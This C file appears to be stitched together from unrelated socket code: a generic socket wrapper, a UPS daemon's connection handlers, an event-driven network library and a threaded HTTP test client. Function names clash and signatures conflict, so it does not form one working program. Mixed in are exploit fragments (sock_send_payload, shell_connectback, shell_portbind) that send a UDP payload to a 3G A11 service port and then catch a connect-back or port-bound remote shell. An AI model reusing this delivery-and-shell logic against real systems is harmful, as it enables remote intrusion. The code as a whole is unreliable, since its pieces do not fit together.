/**
* create a socket
* @param sock the socket to create
* @param type the type of socket to use;
* @param host the hostname to use or contact
* @param port the port to listen on or connect to
*/
int sock_create(sock_t * sock)
{
int y = 1;
#ifdef DEBUG
assert(NULL != sock);
#endif
sock_disconnect(sock);
/* create the socket */
if ((sock->sock = socket(PF_INET, sock->proto, 0)) == -1) {
ERRF(__FILE__, __LINE__, "creating socket: %s!\n", strerror(errno));
return 0;
}
/* get rid of any sockets that are sticking around if we are
* encroaching on their port */
#ifdef WIN32
if (setsockopt
(sock->sock, SOL_SOCKET, SO_REUSEADDR, (const char *)&y,
sizeof(int)) == -1)
#else
if (setsockopt(sock->sock, SOL_SOCKET, SO_REUSEADDR, &y, sizeof(int))
== -1)
#endif
{
ERRF(__FILE__, __LINE__,
"removing any lingering sockets: %s!\n", strerror(errno));
return 0;
}
return 1;
}
static int send_to_one(conn_t *conn, const char *fmt, ...)
{
int ret;
va_list ap;
char buf[ST_SOCK_BUF_LEN];
va_start(ap, fmt);
ret = vsnprintf(buf, sizeof(buf), fmt, ap);
va_end(ap);
if (ret < 1) {
upsdebugx(2, "%s: nothing to write", __func__);
return 1;
}
upsdebugx(5, "%s: %.*s", __func__, ret-1, buf);
ret = write(conn->fd, buf, strlen(buf));
if (ret != (int)strlen(buf)) {
upsdebugx(2, "write %d bytes to socket %d failed", (int)strlen(buf), conn->fd);
sock_disconnect(conn);
return 0; /* failed */
}
return 1; /* OK */
}
static void send_to_all(const char *fmt, ...)
{
int ret;
char buf[ST_SOCK_BUF_LEN];
va_list ap;
conn_t *conn, *cnext;
va_start(ap, fmt);
ret = vsnprintf(buf, sizeof(buf), fmt, ap);
va_end(ap);
if (ret < 1) {
upsdebugx(2, "%s: nothing to write", __func__);
return;
}
upsdebugx(5, "%s: %.*s", __func__, ret-1, buf);
for (conn = connhead; conn; conn = cnext) {
cnext = conn->next;
ret = write(conn->fd, buf, strlen(buf));
if (ret != (int)strlen(buf)) {
upsdebugx(2, "write %d bytes to socket %d failed", (int)strlen(buf), conn->fd);
sock_disconnect(conn);
}
}
}
static void
shell_connectback (long host, int port, long dest,
char *packet, int packet_len)
{
int sock;
int new_sock;
sock = sock_tcp_create ();
if (sock < 0)
{
perror ("[-] Error creating socket");
return;
}
/* we bind before sending the payload to avoid not being
* listening when the connectback shellcode tries to connect
*/
if (sock_bind (sock, host, port) < 0)
{
perror ("[-] Unable to bind/listen");
return;
}
if (sock_send_payload (dest, port, packet, packet_len) < 0)
{
perror ("[-] Unable to send payload");
return;
}
printf ("[-] Waiting 10s for incoming connection (connectback)...\n");
fflush (stdout);
new_sock = sock_accept (sock);
if (new_sock < 0)
{
perror ("[-] Unable to accept connection");
return;
}
sock_disconnect (sock);
shell (new_sock);
sock_disconnect (new_sock);
}
static void sock_read(conn_t *conn)
{
int i, ret;
char buf[SMALLBUF];
ret = read(conn->fd, buf, sizeof(buf));
if (ret < 0) {
switch(errno)
{
case EINTR:
case EAGAIN:
return;
default:
sock_disconnect(conn);
return;
}
}
for (i = 0; i < ret; i++) {
switch(pconf_char(&conn->ctx, buf[i]))
{
case 0: /* nothing to parse yet */
continue;
case 1: /* try to use it, and complain about unknown commands */
if (!sock_arg(conn, conn->ctx.numargs, conn->ctx.arglist)) {
size_t arg;
upslogx(LOG_INFO, "Unknown command on socket: ");
for (arg = 0; arg < conn->ctx.numargs; arg++) {
upslogx(LOG_INFO, "arg %d: %s", (int)arg, conn->ctx.arglist[arg]);
}
}
continue;
default: /* nothing parsed */
upslogx(LOG_NOTICE, "Parse error on sock: %s", conn->ctx.errmsg);
return;
}
}
}
void onaccept_proc(void* userptr, SOCK_HANDLE sock, const SOCK_ADDR* pname)
{
char addr[50];
NETWORK_EVENT event;
printf("accept from %s\n", sock_addr2str(pname, addr));
sock_nonblock(sock);
event.OnConnect = onconnect_proc;
event.OnData = ondata_proc;
event.OnDisconnect = ondisconnect_proc;
event.recvbuf_pool = recvbuf_pool;
event.recvbuf_buf = NULL;
event.recvbuf_max = recvbuf_size;
if(!network_add(sock, &event, NULL)) {
sock_disconnect(sock);
sock_close(sock);
}
}
/**
* destroy a socket
* @param sock the socket to destroy
*/
void sock_destroy(sock_t * sock)
{
#ifdef DEBUG
assert(NULL != sock);
#endif
sock_disconnect(sock);
#ifdef WIN32
WSACleanup();
#endif
sock->sock = INVALID_SOCKET;
sock->connected = 0;
sock->type = -1;
sock->proto = 0;
sock->port = 0;
memset(&sock->addr, 0, sizeof sock->addr);
memset(sock->ip, 0, sizeof sock->ip);
}
static int
sock_send_payload (long dest, int port, char *packet, int packet_len)
{
int sock;
/* create udp socket */
sock = sock_udp_create ();
if (sock_connect (sock, dest, PROTO_3G_A11_PORT) < 0)
return -1;
/* send packet */
send (sock, packet, packet_len, 0);
printf ("[-] UDP packet sent (%d bytes).\n", packet_len);
fflush (stdout);
/* disconnect socket */
sock_disconnect (sock);
return 0;
}
static void
shell_portbind (long dest, int port, char *packet, int packet_len)
{
int sock;
if (sock_send_payload (dest, port, packet, packet_len) < 0)
{
perror ("[-] Unable to send payload");
return;
}
sock = sock_tcp_create ();
if (sock < 0)
{
perror ("[-] Error creating socket");
return;
}
printf ("[-] Delaying 3 seconds before connection attempt (portbind).");
fflush (stdout);
sleep (1);
printf (".");
fflush (stdout);
sleep (1);
printf (".");
fflush (stdout);
sleep (1);
printf ("\n");
if (sock_connect (sock, dest, port) < 0)
{
perror ("[-] Unable to connect");
return;
}
shell (sock);
sock_disconnect (sock);
}
static void sock_close(void)
{
conn_t *conn, *cnext;
if (sockfd != -1) {
close(sockfd);
sockfd = -1;
if (sockfn) {
unlink(sockfn);
free(sockfn);
sockfn = NULL;
}
}
for (conn = connhead; conn; conn = cnext) {
cnext = conn->next;
sock_disconnect(conn);
}
connhead = NULL;
/* conntail = NULL; */
}
void *srv_test_handler(void *arg)
{
char *request;
char buf[1024];
unsigned int i, id;
sock_t *s;
id = (unsigned int)arg;
s = &sock[id];
pthread_mutex_lock(&mt[id]);
request = strdup("GET / HTTP/1.0\r\n\r\n");
for (i = 0; i < SRV_TEST_ITERS; i++) {
memset(buf, '\0', sizeof buf);
if (!sock_connect(s))
ERRF(__FILE__, __LINE__, "connecting to host!\n");
if (!sock_send(s, request, strlen(request)))
ERRF(__FILE__, __LINE__, "sending request!\n");
usleep(500);
if (!sock_recv(s, buf, sizeof buf))
ERRF(__FILE__, __LINE__, "getting response!\n");
sock_disconnect(s);
usleep(500);
printf("%s\n", buf);
}
pthread_mutex_unlock(&mt[id]);
free(request);
return NULL;
}
unsigned int ZION_CALLBACK client_thread_proc(void* arg)
{
SOCK_HANDLE sock = SOCK_INVALID_HANDLE;
char str_out[100];
char str_in[100];
int k = 0, len;
while(!quit_flag) {
os_sleep(10);
if(sock==SOCK_INVALID_HANDLE) {
sock = sock_connect(&sa, 0);
}
if(sock==SOCK_INVALID_HANDLE) continue;
if((rand()%100)<95) {
sprintf(str_out+4, "%p %d ", &sock, k++);
len = strlen(str_out+4);
memset(str_out+4+len, 'a'+k%26, sizeof(str_out)-4-len);
str_out[sizeof(str_out)/sizeof(str_out[0])-1] = '\0';
*((int*)str_out) = sizeof(str_out)-4;
if(sock_writebuf(sock, str_out, sizeof(str_out))==ERR_NOERROR) {
if(sock_readbuf(sock, str_in, sizeof(str_in))==ERR_NOERROR) {
if(memcmp(str_in, str_out, sizeof(str_in))==0) {
continue;
} else {
printf("failed to memcmp\n");
}
} else {
printf("failed to sock_readbuf\n");
}
} else {
printf("failed to sock_writebuf\n");
}
}
sock_disconnect(sock);
sock_close(sock);
sock = SOCK_INVALID_HANDLE;
}
if(sock!=SOCK_INVALID_HANDLE) return 0;
sprintf(str_out+4, "quit");
len = strlen(str_out+4)+1;
*((int*)str_out) = len;
if(sock_writebuf(sock, str_out, 4+len)==ERR_NOERROR) {
if(sock_readbuf(sock, str_in, 4+len)==ERR_NOERROR) {
if(memcmp(str_in, str_out, 4+len)==0) {
printf("very well\n");
} else {
printf("E failed to memcmp\n");
}
} else {
printf("E failed to sock_readbuf\n");
}
} else {
printf("E failed to sock_writebuf\n");
}
return 0;
}